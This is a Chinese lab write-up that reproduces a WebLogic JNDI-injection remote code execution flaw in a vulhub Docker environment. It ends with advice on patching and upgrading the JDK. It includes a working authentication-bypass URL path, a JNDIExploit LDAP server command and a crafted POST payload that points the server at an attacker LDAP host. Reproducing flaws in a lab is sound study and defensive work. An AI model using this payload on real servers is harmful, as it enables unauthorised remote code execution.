0x00简介
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
0x01漏洞概述
该漏洞为Weblogic的远程代码执行漏洞。漏洞主要由JNDI注入,导致攻击者可利用此漏洞远程代码执行。
0x02影响版本
Weblogic Server 10.3.6.0.0
Weblogic Server 12.1.3.0.0
Weblogic Server 12.2.1.3.0
Weblogic Server 12.2.1.4.0
Weblogic Server 14.1.1.0.0
0x03环境搭建
1. 本次漏洞环境使用vulhub中的docker搭建,下载地址
https://github.com/vulhub/vulhub
2. 然后使用vulhub中CVE-2020-14882漏洞为本次漏洞复现环境
cd vulhub-master/weblogic/CVE-2020-14882/
docker-compose up -d
4.在浏览器访问http://your-ip:7001/console,出现以下页面搭建成功
0x04漏洞复现
1.下载LDAP,并启动LDAP,下载地址:
https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11
注:运行ldap需要java1.8环境
java -jar JNDIExploit-v1.11.jar -i 172.16.1.147
3. 使用未授权漏洞配合利用,在首页url处输入以下链接,并进行抓包并发送到重放模块
/console/css/%252e%252e%252f/consolejndi.portal
4. 将get改为post,并构造以下数据包。注:172.16.1;147有个点为分号
_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://172.16.1;147:1389/Basic/WeblogicEcho;AdminServer%22)
0x06修复建议
1、由于是通过JNDI注入进行远程命令执行,所以受到JDK版本的影响,建议升级Weblogic Server运行环境的JDK版本
2、更新最新补丁,参考Oracle官网发布的补丁:
https://www.oracle.com/security-alerts/cpujan2021.html
参考链接:
https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw
转载:https://blog.csdn.net/m0_48520508/article/details/113570548